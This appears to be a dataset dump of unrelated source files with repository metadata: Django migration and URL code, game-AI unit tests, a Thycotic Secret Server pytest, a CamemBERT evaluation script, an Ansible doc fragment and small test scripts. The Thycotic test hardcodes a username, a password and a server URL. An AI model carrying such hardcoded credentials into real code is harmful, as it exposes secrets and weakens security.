# Generated by Django 1.11.1 on 2017-09-02 05:23
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('songwriter', '0005_auto_20170824_1726'),
]
operations = [
migrations.AlterModelOptions(
name='author',
options={'ordering': ['lastname', 'firstname']},
),
migrations.AlterModelOptions(
name='chord',
options={'ordering': ['note']},
),
migrations.AlterModelOptions(
name='editor',
options={'ordering': ['name']},
),
migrations.AlterModelOptions(
name='theme',
options={'ordering': ['name']},
),
]
| 24.625 | 60 | 0.548223 |
73425bf1b2ce90f77e267345bd3b090b0208b790
| 16,334 |
py
|
Python
|
tests/service/ai/test_not_killing_itself_ai.py
|
jonashellmann/informaticup21-team-chillow
|
f2e519af0a5d9a9368d62556703cfb1066ebb58f
|
[
"MIT"
] | 3 |
2021-01-17T23:32:07.000Z
|
2022-01-30T14:49:16.000Z
|
tests/service/ai/test_not_killing_itself_ai.py
|
jonashellmann/informaticup21-team-chillow
|
f2e519af0a5d9a9368d62556703cfb1066ebb58f
|
[
"MIT"
] | 2 |
2021-01-17T13:37:56.000Z
|
2021-04-14T12:28:49.000Z
|
tests/service/ai/test_not_killing_itself_ai.py
|
jonashellmann/informaticup21-team-chillow
|
f2e519af0a5d9a9368d62556703cfb1066ebb58f
|
[
"MIT"
] | 2 |
2021-04-02T14:53:38.000Z
|
2021-04-20T11:10:17.000Z
|
import unittest
from datetime import datetime, timezone
from typing import List
from chillow.service.ai.not_killing_itself_ai import NotKillingItselfAI
from chillow.model.action import Action
from chillow.model.cell import Cell
from chillow.model.direction import Direction
from chillow.model.game import Game
from chillow.model.player import Player
from chillow.service.game_service import GameService
class NotKillingItselfAITest(unittest.TestCase):
def test_ai_should_choose_the_own_non_killing_itself_action(self):
player1 = Player(1, 0, 0, Direction.up, 1, True, "")
player2 = Player(2, 4, 4, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell([player1]), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell([player2])]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 3)
actions: List[Action] = sut.find_surviving_actions(game_service, 3)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 1)
def test_ai_should_choose_the_correct_list_of_actions_non_killing_itself(self):
player1 = Player(1, 0, 1, Direction.up, 1, True, "")
player2 = Player(2, 4, 4, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player1]), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell([player2])]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 3)
actions: List[Action] = sut.find_surviving_actions(game_service, 3)
self.assertTrue(Action.change_nothing in actions)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 2)
def test_ai_should_choose_the_correct_list_of_actions_non_killing_itself2(self):
player1 = Player(1, 1, 2, Direction.up, 1, True, "")
player2 = Player(2, 1, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell([player2]), Cell(), Cell(), Cell()],
[Cell(), Cell([player1]), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 3)
actions: List[Action] = sut.find_surviving_actions(game_service, 3)
self.assertTrue(Action.turn_left in actions)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 2)
def test_ai_should_choose_the_correct_list_of_actions_non_killing_itself_in_turn_6(self):
player1 = Player(1, 0, 4, Direction.up, 3, True, "")
player2 = Player(2, 0, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player1]), Cell(), Cell(), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
game_service.turn.turn_ctr = 6
sut = NotKillingItselfAI(player1, [], 4, 0, 3)
actions: List[Action] = sut.find_surviving_actions(game_service, 1)
self.assertTrue(Action.slow_down in actions)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(Action.speed_up in actions)
self.assertTrue(len(actions) == 3)
def test_ai_should_not_choose_speed_up_if_max_speed_is_allready_reached(self):
MAX_SPEED = 3
player1 = Player(1, 0, 4, Direction.up, MAX_SPEED, True, "")
player2 = Player(2, 0, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player1]), Cell(), Cell(), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], MAX_SPEED, 0, 3)
actions: List[Action] = sut.find_surviving_actions(game_service, 1)
self.assertTrue(Action.slow_down in actions)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 2)
def test_ai_should_calc_action_with_max_distance(self):
player1 = Player(1, 0, 4, Direction.up, 1, True, "")
player2 = Player(2, 0, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player1]), Cell(), Cell(), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 3)
actions: List[Action] = sut.calc_action_with_max_distance_to_visited_cells(game_service, [Action.speed_up,
Action.change_nothing,
Action.turn_right])
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 1)
def test_ai_should_calc_all_action_with_max_distance_with_max_worse_distance(self):
MAX_WORSE_DISTANCE = 1
player1 = Player(1, 0, 4, Direction.up, 1, True, "")
player2 = Player(2, 4, 4, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player1]), Cell(), Cell(), Cell(), Cell([player2])]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, MAX_WORSE_DISTANCE, 3)
actions: List[Action] = sut.calc_action_with_max_distance_to_visited_cells(game_service, [Action.speed_up,
Action.change_nothing,
Action.turn_right])
self.assertTrue(Action.speed_up in actions)
self.assertTrue(Action.change_nothing in actions)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 3)
def test_get_information(self):
player = Player(1, 0, 4, Direction.up, 1, True, "")
sut = NotKillingItselfAI(player, [], 3, 1, 3)
expected = "max_speed=3, max_worse_distance=1, depth=3"
result = sut.get_information()
self.assertEqual(expected, result)
def test_ai_should_choose_the_correct_list_of_actions_non_killing_itself_with_depth_greater_than_one(self):
player1 = Player(1, 1, 2, Direction.up, 1, True, "")
player2 = Player(2, 1, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell([player2]), Cell(), Cell(), Cell()],
[Cell(), Cell([player1]), Cell(), Cell(), Cell()],
[Cell([player2]), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 2)
actions: List[Action] = sut.find_surviving_actions(game_service, 2)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 1)
def test_ai_should_choose_empty_list_with_depth_greater_than_one_and_no_surviving_action(self):
player1 = Player(1, 1, 2, Direction.up, 1, True, "")
player2 = Player(2, 1, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell([player2]), Cell([player2]), Cell(), Cell()],
[Cell(), Cell([player1]), Cell(), Cell([player2]), Cell()],
[Cell([player2]), Cell(), Cell([player2]), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 2)
actions: List[Action] = sut.find_surviving_actions(game_service, 2)
self.assertTrue(len(actions) == 0)
def test_ai_should_choose_correct_list_with_depth_three_and_surviving_action(self):
player1 = Player(1, 1, 2, Direction.up, 1, True, "")
player2 = Player(2, 1, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell([player2]), Cell([player2]), Cell(), Cell()],
[Cell(), Cell([player1]), Cell(), Cell([player2]), Cell()],
[Cell([player2]), Cell(), Cell(), Cell(), Cell()],
[Cell(), Cell(), Cell(), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 3)
actions: List[Action] = sut.find_surviving_actions(game_service, 3)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 1)
def test_ai_should_choose_empty_list_with_depth_three_and_no_surviving_action(self):
player1 = Player(1, 1, 2, Direction.up, 1, True, "")
player2 = Player(2, 1, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell([player2]), Cell([player2]), Cell(), Cell()],
[Cell(), Cell([player1]), Cell(), Cell([player2]), Cell()],
[Cell([player2]), Cell([player2]), Cell(), Cell([player2]), Cell()],
[Cell(), Cell(), Cell([player2]), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 3)
actions: List[Action] = sut.find_surviving_actions(game_service, 3)
self.assertTrue(len(actions) == 0)
def test_ai_should_choose_best_list_of_actions_by_depth_from_lower_depth(self):
player1 = Player(1, 1, 2, Direction.up, 1, True, "")
player2 = Player(2, 1, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell([player2]), Cell([player2]), Cell(), Cell()],
[Cell(), Cell([player1]), Cell(), Cell([player2]), Cell()],
[Cell([player2]), Cell([player2]), Cell(), Cell([player2]), Cell()],
[Cell(), Cell(), Cell([player2]), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 5)
actions: List[Action] = sut.find_surviving_actions_with_best_depth(game_service)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 1)
def test_ai_should_choose_best_list_of_actions_by_depth(self):
player1 = Player(1, 1, 2, Direction.up, 1, True, "")
player2 = Player(2, 1, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell([player2]), Cell([player2]), Cell(), Cell()],
[Cell(), Cell([player1]), Cell(), Cell([player2]), Cell()],
[Cell([player2]), Cell(), Cell(), Cell([player2]), Cell()],
[Cell(), Cell(), Cell([player2]), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 5)
actions: List[Action] = sut.find_surviving_actions_with_best_depth(game_service)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 1)
def test_ai_should_choose_best_list_of_actions_in_lowest_possible_depth(self):
player1 = Player(1, 1, 2, Direction.up, 1, True, "")
player2 = Player(2, 1, 1, Direction.down, 3, True, "")
players = [player1, player2]
cells = [[Cell(), Cell(), Cell(), Cell(), Cell()],
[Cell([player2]), Cell([player2]), Cell([player2]), Cell(), Cell()],
[Cell(), Cell([player1]), Cell(), Cell([player2]), Cell()],
[Cell([player2]), Cell(), Cell([player2]), Cell([player2]), Cell()],
[Cell(), Cell(), Cell([player2]), Cell(), Cell()]]
time = datetime(2020, 10, 1, 12, 5, 13, 0, timezone.utc)
game = Game(5, 5, cells, players, 2, True, time)
game_service = GameService(game)
sut = NotKillingItselfAI(player1, [], 3, 0, 5)
actions: List[Action] = sut.find_surviving_actions_with_best_depth(game_service)
self.assertTrue(Action.turn_left in actions)
self.assertTrue(Action.turn_right in actions)
self.assertTrue(len(actions) == 2)
| 52.185304 | 120 | 0.53355 |
c3027f734157db362e121ea8ce2b5d36ad4e6075
| 604 |
py
|
Python
|
gemtown/users/urls.py
|
doramong0926/gemtown
|
2c39284e3c68f0cc11994bed0ee2abaad0ea06b6
|
[
"MIT"
] | null | null | null |
gemtown/users/urls.py
|
doramong0926/gemtown
|
2c39284e3c68f0cc11994bed0ee2abaad0ea06b6
|
[
"MIT"
] | 5 |
2020-09-04T20:13:39.000Z
|
2022-02-17T22:03:33.000Z
|
gemtown/users/urls.py
|
doramong0926/gemtown
|
2c39284e3c68f0cc11994bed0ee2abaad0ea06b6
|
[
"MIT"
] | null | null | null |
from django.urls import path
from . import views
app_name = "users"
urlpatterns = [
path("all/", view=views.UserList.as_view(), name="all_user"),
path("<int:user_id>/password/", view=views.ChangePassword.as_view(), name="change password"),
path("<int:user_id>/follow/", view=views.FollowUser.as_view(), name="follow user"),
path("<int:user_id>/unfollow/", view=views.UnfollowUser.as_view(), name="unfollow user"),
path("<int:user_id>/", view=views.UserFeed.as_view(), name="user_detail_infomation"),
path("login/facebook/", view=views.FacebookLogin.as_view(), name="fb_login"),
]
| 50.333333 | 97 | 0.701987 |
c302fe24cced11c5bc506098882205738bad2b79
| 3,132 |
py
|
Python
|
Packs/Thycotic/Integrations/Thycotic/Thycotic_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 799 |
2016-08-02T06:43:14.000Z
|
2022-03-31T11:10:11.000Z
|
Packs/Thycotic/Integrations/Thycotic/Thycotic_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 9,317 |
2016-08-07T19:00:51.000Z
|
2022-03-31T21:56:04.000Z
|
Packs/Thycotic/Integrations/Thycotic/Thycotic_test.py
|
diCagri/content
|
c532c50b213e6dddb8ae6a378d6d09198e08fc9f
|
[
"MIT"
] | 1,297 |
2016-08-04T13:59:00.000Z
|
2022-03-31T23:43:06.000Z
|
import pytest
from Thycotic import Client, \
secret_password_get_command, secret_username_get_command, \
secret_get_command, secret_password_update_command, secret_checkout_command, secret_checkin_command, \
secret_delete_command, folder_create_command, folder_delete_command, folder_update_command
from test_data.context import GET_PASSWORD_BY_ID_CONTEXT, GET_USERNAME_BY_ID_CONTENT, \
SECRET_GET_CONTENT, SECRET_PASSWORD_UPDATE_CONTEXT, SECRET_CHECKOUT_CONTEXT, SECRET_CHECKIN_CONTEXT, \
SECRET_DELETE_CONTEXT, FOLDER_CREATE_CONTEXT, FOLDER_DELETE_CONTEXT, FOLDER_UPDATE_CONTEXT
from test_data.http_responses import GET_PASSWORD_BY_ID_RAW_RESPONSE, GET_USERNAME_BY_ID_RAW_RESPONSE, \
SECRET_GET_RAW_RESPONSE, SECRET_PASSWORD_UPDATE_RAW_RESPONSE, SECRET_CHECKOUT_RAW_RESPONSE, \
SECRET_CHECKIN_RAW_RESPONSE, SECRET_DELETE_RAW_RESPONSE, FOLDER_CREATE_RAW_RESPONSE, FOLDER_DELETE_RAW_RESPONSE, \
FOLDER_UPDATE_RAW_RESPONSE
GET_PASSWORD_BY_ID_ARGS = {"secret_id": "4"}
GET_USERNAME_BY_ID_ARGS = {"secret_id": "4"}
SECRET_GET_ARGS = {"secret_id": "4"}
SECRET_PASSWORD_UPDATE_ARGS = {"secret_id": "4", "newpassword": "NEWPASSWORD1"}
SECRET_CHECKOUT_ARGS = {"secret_id": "4"}
SECRET_CHECKIN_ARGS = {"secret_id": "4"}
SECRET_DELETE_ARGS = {"id": "9"}
FOLDER_CREATE_ARGS = {"folderName": "xsoarFolderTest3", "folderTypeId": "1", "parentFolderId": "3"}
FOLDER_DELETE_ARGS = {"folder_id": "9"}
FOLDER_UPDATE_ARGS = {"id": "12", "folderName": "xsoarTF3New"}
@pytest.mark.parametrize('command, args, http_response, context', [
(secret_password_get_command, GET_PASSWORD_BY_ID_ARGS, GET_PASSWORD_BY_ID_RAW_RESPONSE, GET_PASSWORD_BY_ID_CONTEXT),
(secret_username_get_command, GET_USERNAME_BY_ID_ARGS, GET_USERNAME_BY_ID_RAW_RESPONSE, GET_USERNAME_BY_ID_CONTENT),
(secret_get_command, SECRET_GET_ARGS, SECRET_GET_RAW_RESPONSE, SECRET_GET_CONTENT),
(secret_password_update_command, SECRET_PASSWORD_UPDATE_ARGS, SECRET_PASSWORD_UPDATE_RAW_RESPONSE,
SECRET_PASSWORD_UPDATE_CONTEXT),
(secret_checkout_command, SECRET_CHECKOUT_ARGS, SECRET_CHECKOUT_RAW_RESPONSE, SECRET_CHECKOUT_CONTEXT),
(secret_checkin_command, SECRET_CHECKIN_ARGS, SECRET_CHECKIN_RAW_RESPONSE, SECRET_CHECKIN_CONTEXT),
(secret_delete_command, SECRET_DELETE_ARGS, SECRET_DELETE_RAW_RESPONSE, SECRET_DELETE_CONTEXT),
(folder_create_command, FOLDER_CREATE_ARGS, FOLDER_CREATE_RAW_RESPONSE, FOLDER_CREATE_CONTEXT),
(folder_delete_command, FOLDER_DELETE_ARGS, FOLDER_DELETE_RAW_RESPONSE, FOLDER_DELETE_CONTEXT),
(folder_update_command, FOLDER_UPDATE_ARGS, FOLDER_UPDATE_RAW_RESPONSE, FOLDER_UPDATE_CONTEXT)
])
def test_thycotic_commands(command, args, http_response, context, mocker):
mocker.patch.object(Client, '_generate_token')
client = Client(server_url="https://thss.softwarium.net/SecretServer", username="xsoar1", password="HfpuhXjv123",
proxy=False, verify=False)
mocker.patch.object(Client, '_http_request', return_value=http_response)
outputs = command(client, **args)
results = outputs.to_context()
assert results.get("EntryContext") == context
| 60.230769 | 120 | 0.814815 |
6f319a2e3b23a21c6ff1ef69178d3b4bc2931b78
| 3,322 |
py
|
Python
|
src/check_results.py
|
jagwar/Sentiment-Analysis
|
312186c066c360ed4b3ebc9e999dba419f10e93c
|
[
"MIT"
] | null | null | null |
src/check_results.py
|
jagwar/Sentiment-Analysis
|
312186c066c360ed4b3ebc9e999dba419f10e93c
|
[
"MIT"
] | null | null | null |
src/check_results.py
|
jagwar/Sentiment-Analysis
|
312186c066c360ed4b3ebc9e999dba419f10e93c
|
[
"MIT"
] | null | null | null |
import os
import json
import numpy as np
import torch
from torch.utils.data import DataLoader, RandomSampler, TensorDataset, SequentialSampler
from transformers import CamembertTokenizer, CamembertForSequenceClassification
import pandas as pd
from tqdm import tqdm, trange
# tokenizer = CamembertTokenizer.from_pretrained('/home/crannou/workspace/sentiment-eai/data/36e8f471-821d-4270-be56-febb1be36c26')
# model = CamembertForSequenceClassification.from_pretrained('/home/crannou/workspace/sentiment-eai/data/36e8f471-821d-4270-be56-febb1be36c26')
# tokenizer = CamembertTokenizer.from_pretrained('/home/crannou/workspace/sentiment-eai/7a37b1e5-8e7b-45d1-9e87-7314e8e66c0c/')
# model = CamembertForSequenceClassification.from_pretrained('/home/crannou/workspace/sentiment-eai/7a37b1e5-8e7b-45d1-9e87-7314e8e66c0c/')
tokenizer = CamembertTokenizer.from_pretrained('/home/crannou/workspace/serving-preset-images/sentiment-analysis-fr/app/model_sources')
model = CamembertForSequenceClassification.from_pretrained('/home/crannou/workspace/serving-preset-images/sentiment-analysis-fr/app/model_sources')
def eval_model():
df = pd.read_csv('/home/crannou/notebooks/review_polarity_bin.csv', sep=';')
preds = []
all_input_ids = []
all_attention_masks = []
df = df.sample(frac=0.1, random_state=42)
all_labels = df['polarity'].values
for sentence in df['review_content']:
input_ids, attention_mask = get_features(sentence)
all_input_ids.append(input_ids)
all_attention_masks.append(attention_mask)
t_inputs_ids = torch.tensor(all_input_ids, dtype=torch.long)
t_attention_mask = torch.tensor(all_attention_masks, dtype=torch.long)
t_labels = torch.tensor(all_labels, dtype=torch.long)
dataset = TensorDataset(t_inputs_ids, t_attention_mask, t_labels)
eval_sampler = SequentialSampler(dataset)
eval_dataloader = DataLoader(
dataset, sampler=eval_sampler, batch_size=32
)
model.eval()
preds = None
out_label_ids = None
with torch.no_grad():
for batch in tqdm(eval_dataloader, desc="Evaluating"):
batch = tuple(t.to("cpu") for t in batch)
inputs = {
"input_ids": batch[0], "attention_mask": batch[1], "labels": batch[2]}
outputs = model(**inputs)
_, logits = outputs[:2]
if preds is None:
preds = logits.detach().cpu().numpy()
out_label_ids = inputs["labels"].detach().cpu().numpy()
else:
preds = np.append(preds, logits.detach().cpu().numpy(), axis=0)
out_label_ids = np.append(
out_label_ids, inputs["labels"].detach().cpu().numpy(), axis=0)
preds = np.argmax(preds, axis=1)
result = {"acc": (preds == out_label_ids).mean()}
print(result)
def get_features(sentence):
max_length=min(128, tokenizer.max_len)
input_ids = tokenizer.encode(
sentence, add_special_tokens=True, max_length=min(128, tokenizer.max_len),
)
padding_length = max_length - len(input_ids)
attention_mask = [1] * len(input_ids)
input_ids = input_ids + ([0] * padding_length)
attention_mask = attention_mask + ([0] * padding_length)
return input_ids, attention_mask
if __name__ == '__main__':
eval_model()
| 40.024096 | 147 | 0.705298 |
d2c4507ff5f2b0e60108a433da49147fd8f6e6c4
| 3,008 |
py
|
Python
|
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/doc_fragments/nios.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | 17 |
2017-06-07T23:15:01.000Z
|
2021-08-30T14:32:36.000Z
|
ansible/ansible/plugins/doc_fragments/nios.py
|
SergeyCherepanov/ansible
|
875711cd2fd6b783c812241c2ed7a954bf6f670f
|
[
"MIT"
] | 9 |
2017-06-25T03:31:52.000Z
|
2021-05-17T23:43:12.000Z
|
ansible/ansible/plugins/doc_fragments/nios.py
|
SergeyCherepanov/ansible
|
875711cd2fd6b783c812241c2ed7a954bf6f670f
|
[
"MIT"
] | 3 |
2018-05-26T21:31:22.000Z
|
2019-09-28T17:00:45.000Z
|
# -*- coding: utf-8 -*-
# Copyright: (c) 2015, Peter Sprygada <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
class ModuleDocFragment(object):
# Standard files documentation fragment
DOCUMENTATION = r'''
options:
provider:
description:
- A dict object containing connection details.
type: dict
suboptions:
host:
description:
- Specifies the DNS host name or address for connecting to the remote
instance of NIOS WAPI over REST
- Value can also be specified using C(INFOBLOX_HOST) environment
variable.
type: str
required: true
username:
description:
- Configures the username to use to authenticate the connection to
the remote instance of NIOS.
- Value can also be specified using C(INFOBLOX_USERNAME) environment
variable.
type: str
password:
description:
- Specifies the password to use to authenticate the connection to
the remote instance of NIOS.
- Value can also be specified using C(INFOBLOX_PASSWORD) environment
variable.
type: str
validate_certs:
description:
- Boolean value to enable or disable verifying SSL certificates
- Value can also be specified using C(INFOBLOX_SSL_VERIFY) environment
variable.
type: bool
default: no
aliases: [ ssl_verify ]
http_request_timeout:
description:
- The amount of time before to wait before receiving a response
- Value can also be specified using C(INFOBLOX_HTTP_REQUEST_TIMEOUT) environment
variable.
type: int
default: 10
max_retries:
description:
- Configures the number of attempted retries before the connection
is declared usable
- Value can also be specified using C(INFOBLOX_MAX_RETRIES) environment
variable.
type: int
default: 3
wapi_version:
description:
- Specifies the version of WAPI to use
- Value can also be specified using C(INFOBLOX_WAP_VERSION) environment
variable.
- Until ansible 2.8 the default WAPI was 1.4
type: str
default: '2.1'
max_results:
description:
- Specifies the maximum number of objects to be returned,
if set to a negative number the appliance will return an error when the
number of returned objects would exceed the setting.
- Value can also be specified using C(INFOBLOX_MAX_RESULTS) environment
variable.
type: int
default: 1000
notes:
- "This module must be run locally, which can be achieved by specifying C(connection: local)."
- Please read the :ref:`nios_guide` for more detailed information on how to use Infoblox with Ansible.
'''
| 35.809524 | 104 | 0.635306 |
8268e3ff708fceac06d057f89101a1b211a8db3a
| 364 |
py
|
Python
|
pacman-arch/test/pacman/tests/upgrade084.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/upgrade084.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/upgrade084.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = "Install a package ('any' architecture)"
p = pmpkg("dummy")
p.files = ["bin/dummy",
"usr/man/man1/dummy.1"]
p.arch = 'any'
self.addpkg(p)
self.option["Architecture"] = ['auto']
self.args = "-U %s" % p.filename()
self.addrule("PACMAN_RETCODE=0")
self.addrule("PKG_EXIST=dummy")
for f in p.files:
self.addrule("FILE_EXIST=%s" % f)
| 21.411765 | 59 | 0.648352 |
c4e5c92095ff07343908dc4ad5fe4a10a7b5ac03
| 498 |
pyde
|
Python
|
sketches/noll/noll.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 4 |
2018-06-03T02:11:46.000Z
|
2021-08-18T19:55:15.000Z
|
sketches/noll/noll.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | null | null | null |
sketches/noll/noll.pyde
|
kantel/processingpy
|
74aae222e46f68d1c8f06307aaede3cdae65c8ec
|
[
"MIT"
] | 3 |
2019-12-23T19:12:51.000Z
|
2021-04-30T14:00:31.000Z
|
from random import randint
margin = 5
def setup():
size(400, 600)
this.surface.setTitle("Re-Enactment A. Michael Noll")
noLoop()
def draw():
background(235, 215, 182)
strokeWeight(2)
x1 = randint(margin, width - margin)
y1 = randint(margin, height - margin)
for _ in range(50):
x2 = randint(margin, width - margin)
y2 = randint(margin, height - margin)
line(x1, y1, x1, y2)
line(x1, y2, x2, y2)
x1 = x2
y1 = y2
| 22.636364 | 57 | 0.574297 |
f219263481489e692def3950e22f5330890ee7b8
| 476 |
py
|
Python
|
exercises/fr/test_01_09.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/fr/test_01_09.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
exercises/fr/test_01_09.py
|
tuanducdesign/spacy-course
|
f8d092c5fa2997fccb3f367d174dce8667932b3d
|
[
"MIT"
] | null | null | null |
def test():
assert "for ent in doc.ents" in __solution__, "Itères-tu sur les entités ?"
assert x_pro.text == "X Pro", "Es-tu certain que x_pro contient les bons tokens ?"
__msg__.good(
"Parfait ! Bien sur, tu n'as pas besoin de faire cela manuellement à chaque fois."
"Dans le prochain exercice, tu vas découvrir le matcher à base de règles de spaCy, "
"qui peut t'aider à trouver des mots et des phrases spécifiques dans un texte."
)
| 47.6 | 92 | 0.676471 |
96b888fef4eb174221ced8eecdc0b4280bce51d8
| 3,932 |
py
|
Python
|
handledata.py
|
bioPunkKitchen/climate.local
|
ccd29da3d84542d5f9c73a5d75bc3ceefeef1f08
|
[
"MIT"
] | 1 |
2019-05-28T18:33:49.000Z
|
2019-05-28T18:33:49.000Z
|
handledata.py
|
bioPunkKitchen/climate.local
|
ccd29da3d84542d5f9c73a5d75bc3ceefeef1f08
|
[
"MIT"
] | 1 |
